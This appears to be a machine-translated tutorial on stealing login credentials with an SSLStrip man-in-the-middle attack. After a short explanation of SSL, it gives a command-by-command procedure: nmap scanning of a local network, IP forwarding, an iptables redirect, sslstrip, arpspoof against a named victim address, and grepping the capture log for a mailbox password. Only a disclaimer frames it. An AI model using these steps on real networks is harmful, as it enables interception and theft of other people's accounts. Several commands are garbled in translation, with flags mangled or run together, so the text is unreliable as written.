SSL man-in-the-middle attack

This article aims to discuss the security of SSL encryption, and is not responsible for any behavior performed by readers using the methods and tools described in this article.
 
1. What is SSL?
 
SSL is short for Secure Socket Layer. It is a Secure Socket Layer developed by NetScape to ensure the security of data transmission over the Internet, ensure that data is not intercepted or eavesdropped during network transmission.
 
SSL3.0 is a popular version. It is widely used for identity authentication and encrypted data transmission between Web browsers and servers.
 
SSL provides the following services:
 
(1) authenticate users and servers to ensure that data is sent to the correct customers and servers.
 
(2) encrypt data to prevent data theft.
 
(3) maintain data integrity and ensure that data is not changed during transmission.
 
 
 
Ii. About SSLStrip
 
The working principle and steps of SSLStrip are as follows:
 
(1) first conduct man-in-the-middle attacks to intercept HTTP traffic.
 
(2) replace all the HTTPS links with HTTP, and write down all the changed links.
 
(3) Use HTTP to connect to the victim machine.
 
(4) Establish HTTPS with a valid server at the same time.
 
(5) All communications between victims and legitimate servers are forwarded by proxy.
 
(6) The icon that appears is replaced with the "Yellow lock" icon that you are familiar.
 
(7) In this way, the man-in-the-middle attack successfully defrauded the password, account, and other information.
 
Knowledge.
 
The official download address of SSLStrip is http://www.thoughtcrime.org/software/sslstrip/. currently, only the version of SSLStrip in Linux is available. This tool is written in Python and must be supported by the Python environment. Download and install it first.
 
Iii. SSLStrip attack operations (using the cracked user IP address as 192.168.1.33 and the user account as test
 
The password of the 126 mailbox is used as an example)
 
Step 1:
 
Use nmap to Scan Machines enabled in the internal network to identify Attack Targets
 
Nmap-sP 192.168.1.0/24
 
Parameter description:
 
-SP: Enable ICMP detection, that is, ping scan.
 
Step 2:
 
Change Nic mode to forwarding Mode
 
Echo "1">/proc/sys/net/ipv4/ip_forward
 
Step 3:
 
Add Rules in iptables to import all http data to sslstrip.
 
Iptables-t-a prerouting-p tcp-destination-port 80-j REDIRECT
 
-To-port 9527.
 
Or
 
Iptables-t nat-a prerouting-p tcp-dport 80-j REDIRECT-to-port 9527
 
Parameter description:
 
-T: Specifies the table of matching packages to be operated by the command.
 
-A: add rules at the end of the selected chain
 
-P: Protocol formulation
 
-Destination-port or-dport: Specify the target port
 
-J: Target jump Step 4:
 
Enable SSLStrip
 
Python./sslstrip. py-a-l 9527 pojie. log
 
Parameter description:
 
-A: records all SSL and HTTP data traffic from the server.
 
-L: the listening port, which must be the same as the port set in iptables.
 
-W: Save the intercepted content as a file.
 
Step 5:
 
Launch man-in-the-middle attacks
 
Arpspoof-I eth0-t 192.168.1.33 192.168.1.1
 
Parameter description:
 
-I eth0: the specified working network card.
 
-T: Specify the target IP address and gateway IP address to be spoofed.
 
Step 6:
 
View the account information in the pojie. log file generated by SSLStrip
 
Cat pojie. log | grep test
 
Find the content containing the account test characters from the pojie. log File to find the password of the user test.
 
.